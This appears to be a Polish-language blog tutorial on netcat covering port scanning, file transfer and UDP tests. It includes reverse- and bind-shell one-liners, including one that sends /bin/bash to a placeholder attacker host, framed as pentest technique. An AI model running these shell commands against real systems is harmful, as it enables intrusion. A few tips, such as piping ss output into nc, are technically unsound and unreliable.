Nie każdy tool sieciowy musi być skomplikowany. Netcat (nc) to jedno polecenie, które robi wszystko: skanuje porty, tworzy serwery, klienci i nawet backdoory. Idealne po netstat/ss – bo czasem trzeba nie tylko patrzeć, ale działać.
Czym jest netcat?
nc to szwajcarski scyzoryk TCP/UDP. Działa na każdym Linuksie (zazwyczaj preinstalowany). Podstawowa składnia:
nc [opcje] [host] [port]Skanowanie portów
Zamiast nmap do szybkich testów:
# Skan TCP na localhost
nc -zv localhost 22 80 443
# Timeout i verbosy
nc -v -w 3 192.168.1.1 1-1000Proste skanowanie z netcat
Sprawdź, czy port żyje – szybciej niż pełny nmap. Prosty serwer plików
Udostępnij plik w LAN bez httpd:
# Na serwerze (nasłuchuj na 1234)
nc -l -p 1234 < plik.txt
# Na kliencie
nc serwer_ip 1234 > pobrany.txtUWAGA: Otwarty listener = ryzyko nc bez firewall to zaproszenie dla każdego. Zawsze ogranicz -p i dodaj iptables.
Reverse shell (pentest)
Klasyk w exploitach – ofiara łączy się z Tobą:
Na atakującym (nasłuch):
nc -lvnp 4444Na ofierze:
nc attacker_ip 4444 -e /bin/bashBind shell
Ofiara nasłuchuje, Ty łączysz:
Na ofierze:
nc -lvp 4444 -e /bin/bashZaawansowane triki Transfer katalogu
tar czf - /sciezka/ | nc -l -p 1234
nc serwer 1234 | tar xzf -UDP testy
nc -u -v serwer 53
echo "test" | nc -u serwer 53Netcat w skryptach
Automatyzuj z bash – loop po portach.
PRAKTYKA: Tylko na swoich maszynach Reverse/bind shells to ofensywa. Testuj tylko autoryzowane cele (np. HackTheBox).
Podsumowanie praktyczne
Netcat to nie tylko narzędzie – to sposób myślenia sieciowego: zobacz połączenie (netstat/ss) → przetestuj aktywnie (nc) → zabezpiecz (iptables). Seria “Wróćmy do podstaw” buduje Twój arsenał CLI krok po kroku:
- netstat/ss: Co się łączy z moim systemem?
- netcat: A co jeśli ja się połączę?
- [następny: tcpdump]: Co konkretnie płynie po tych połączeniach?
# Twój nowy zestaw cybersec:
ss -tuln | nc -zv localhost && echo "Porty aktywne i testowane!"Pro tip: Zapisuj wyniki do pliku (nc -v -o log.txt). Logi to 80% sukcesu w debugowaniu i audytach.
OSTATNIE SŁOWO: nc to miecz obosieczny. Na produkcji używaj z iptables -A INPUT -p tcp --dport 4444 -j DROP przed każdym listenerem.
Kolejny odcinek: tcpdump – zobaczysz, co naprawdę płynie w Twojej sieci. Zostań z nami!